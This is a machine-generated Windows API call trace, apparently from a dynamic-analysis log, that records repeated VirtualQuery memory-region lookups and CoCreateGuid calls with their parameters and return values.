	[0349.954] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.955] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.955] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.955] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.955] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.955] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.955] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.969] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.969] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.969] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.969] VirtualQuery (in: lpAddress=0xcb780, lpBuffer=0xcc640, dwLength=0x30 | out: lpBuffer=0xcc640*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.969] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.969] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.969] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.970] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.970] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x25199ad, Data2=0x8d2b, Data3=0x4fcd, Data4=([0]=0xa6, [1]=0xd7, [2]=0xab, [3]=0xcc, [4]=0xbd, [5]=0x7, [6]=0xb6, [7]=0x86))) returned 0x0
	[0349.970] VirtualQuery (in: lpAddress=0xcb340, lpBuffer=0xcc200, dwLength=0x30 | out: lpBuffer=0xcc200*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.970] VirtualQuery (in: lpAddress=0xcb3d0, lpBuffer=0xcc290, dwLength=0x30 | out: lpBuffer=0xcc290*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.971] VirtualQuery (in: lpAddress=0xcb5f0, lpBuffer=0xcc4b0, dwLength=0x30 | out: lpBuffer=0xcc4b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.971] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x52da74f5, Data2=0x4cb3, Data3=0x4824, Data4=([0]=0x8a, [1]=0xe9, [2]=0x18, [3]=0x9b, [4]=0x8d, [5]=0x9d, [6]=0x10, [7]=0xfa))) returned 0x0
	[0349.971] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa05ea71e, Data2=0x30a9, Data3=0x4802, Data4=([0]=0x83, [1]=0x9b, [2]=0x67, [3]=0x84, [4]=0xae, [5]=0x6d, [6]=0x51, [7]=0xd1))) returned 0x0
	[0349.971] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x96c5f6a1, Data2=0xe23f, Data3=0x4ab4, Data4=([0]=0x9b, [1]=0xb5, [2]=0x4d, [3]=0xaf, [4]=0x18, [5]=0x23, [6]=0xc6, [7]=0x33))) returned 0x0
	[0349.971] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x824f755f, Data2=0x4a0b, Data3=0x4286, Data4=([0]=0x8e, [1]=0x78, [2]=0x14, [3]=0xbf, [4]=0xa5, [5]=0xa4, [6]=0xf, [7]=0xa5))) returned 0x0
	[0349.972] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xaf175a94, Data2=0x4642, Data3=0x4f7f, Data4=([0]=0x92, [1]=0xc6, [2]=0xd6, [3]=0xf4, [4]=0x9e, [5]=0x62, [6]=0x8a, [7]=0x7))) returned 0x0
	[0349.972] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x314c33ba, Data2=0x14b, Data3=0x4ca4, Data4=([0]=0xa1, [1]=0x50, [2]=0x2f, [3]=0x2e, [4]=0xa2, [5]=0x99, [6]=0x21, [7]=0x65))) returned 0x0
	[0349.972] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa2673244, Data2=0x1b4c, Data3=0x41bb, Data4=([0]=0xbc, [1]=0xcf, [2]=0x15, [3]=0x3d, [4]=0xf9, [5]=0x76, [6]=0x1e, [7]=0x1f))) returned 0x0
	[0349.972] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xe2d502d3, Data2=0xaad, Data3=0x47bb, Data4=([0]=0xb5, [1]=0xf7, [2]=0xb5, [3]=0xd1, [4]=0xc6, [5]=0x9a, [6]=0xc7, [7]=0x9d))) returned 0x0
	[0349.972] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.972] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.972] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.972] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.973] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.973] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.973] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.973] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.973] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.973] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.973] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.974] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.974] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.974] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.974] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.974] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.974] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.974] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.975] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.975] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.975] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x92111ad0, Data2=0xc1bb, Data3=0x41e8, Data4=([0]=0xae, [1]=0xa8, [2]=0x4, [3]=0x3a, [4]=0x8, [5]=0xc5, [6]=0x5e, [7]=0x50))) returned 0x0
	[0349.975] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.975] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.975] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.975] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.975] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.976] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.977] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4b5e9168, Data2=0x2352, Data3=0x47de, Data4=([0]=0x96, [1]=0xe3, [2]=0x35, [3]=0x33, [4]=0x98, [5]=0x45, [6]=0xdc, [7]=0x44))) returned 0x0
	[0349.978] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.978] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.978] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.978] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.978] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.978] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.978] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcb780, lpBuffer=0xcc640, dwLength=0x30 | out: lpBuffer=0xcc640*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.979] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.980] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x94c860e8, Data2=0x5211, Data3=0x44d7, Data4=([0]=0x88, [1]=0x62, [2]=0x41, [3]=0xd2, [4]=0xfa, [5]=0xaa, [6]=0xaa, [7]=0x9d))) returned 0x0
	[0349.980] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xf1428b66, Data2=0xff4a, Data3=0x42be, Data4=([0]=0x88, [1]=0xb0, [2]=0xe0, [3]=0xcb, [4]=0xa1, [5]=0xe5, [6]=0xa4, [7]=0xee))) returned 0x0
	[0349.980] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x838f0ccf, Data2=0x83, Data3=0x4fc0, Data4=([0]=0x88, [1]=0x48, [2]=0x6c, [3]=0x90, [4]=0x6d, [5]=0xc2, [6]=0x93, [7]=0x97))) returned 0x0
	[0349.980] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xdc35e6f7, Data2=0x993b, Data3=0x45ca, Data4=([0]=0xa3, [1]=0x16, [2]=0xc6, [3]=0x7d, [4]=0x93, [5]=0xd1, [6]=0x29, [7]=0xb3))) returned 0x0
	[0349.980] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4da36a36, Data2=0xb47f, Data3=0x40cd, Data4=([0]=0xb5, [1]=0x4d, [2]=0x9c, [3]=0xc7, [4]=0x76, [5]=0x6b, [6]=0x2a, [7]=0x4b))) returned 0x0
